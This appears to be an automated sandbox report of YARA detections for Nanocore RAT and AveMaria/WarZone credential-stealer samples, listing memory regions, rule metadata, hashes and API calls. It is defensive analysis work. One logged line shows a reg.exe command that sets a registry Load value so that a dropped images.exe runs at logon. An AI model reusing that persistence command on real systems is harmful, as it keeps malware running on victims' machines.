Source: Yara match	File source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 40.2.KetqqsbuJ.exe.6c50000.31.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c70000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.60a0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3cb81d4.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 40.2.KetqqsbuJ.exe.6cc0000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.40006e6.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c30000.29.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.2d270d0.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c00000.26.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 40.2.KetqqsbuJ.exe.5160000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.40006e6.16.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3cae5cf.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c8e8a4.34.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 40.2.KetqqsbuJ.exe.2cf4ec4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 40.2.KetqqsbuJ.exe.3ca9930.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.5280000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c20000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c84c9f.33.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 40.2.KetqqsbuJ.exe.6c70000.32.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c40000.30.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6ab0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.60a0000.24.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c40000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c50000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 40.2.KetqqsbuJ.exe.3e88e65.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c10000.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3ca9930.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c10000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6cc0000.36.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 40.2.KetqqsbuJ.exe.6c00000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c80000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.2d3334c.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3fe9487.14.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.6c80000.35.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.5280000.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.480758507.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00413279
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0041DEAA
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_06CD1998
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_06CC46D3
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_06CC42EB
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_06CC3324
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEE480
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEE47B
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEBBD4
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_050AF5F8
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_050A9788
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_050AA61B
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_050AA611

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: String function: 004036F7 appears 71 times
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: String function: 00411E88 appears 49 times

Source: Xjf4yH9N2t.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Xjf4yH9N2t.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Xjf4yH9N2t.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microC[1].exe.22.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microC[1].exe.22.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microC[1].exe.22.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KetqqsbuJ.exe.22.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KetqqsbuJ.exe.22.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KetqqsbuJ.exe.22.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.40.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.40.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.40.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Xjf4yH9N2t.exe, 00000000.00000000.203862772.0000000000972000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMdaHelp.exe< vs Xjf4yH9N2t.exe
Source: Xjf4yH9N2t.exe	Binary or memory string: OriginalFilename vs Xjf4yH9N2t.exe
Source: Xjf4yH9N2t.exe, 00000005.00000002.242412512.0000000000082000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMdaHelp.exe< vs Xjf4yH9N2t.exe
Source: Xjf4yH9N2t.exe	Binary or memory string: OriginalFilename vs Xjf4yH9N2t.exe
Source: Xjf4yH9N2t.exe, 00000006.00000002.243660750.00000000000F2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMdaHelp.exe< vs Xjf4yH9N2t.exe
Source: Xjf4yH9N2t.exe	Binary or memory string: OriginalFilename vs Xjf4yH9N2t.exe
Source: Xjf4yH9N2t.exe, 00000007.00000000.244612473.0000000000762000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMdaHelp.exe< vs Xjf4yH9N2t.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys

Source: Xjf4yH9N2t.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'

Source: 40.2.KetqqsbuJ.exe.6c50000.31.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c50000.31.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c70000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c70000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.60a0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.60a0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3cb81d4.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3cb81d4.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 40.2.KetqqsbuJ.exe.6cc0000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6cc0000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.40006e6.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
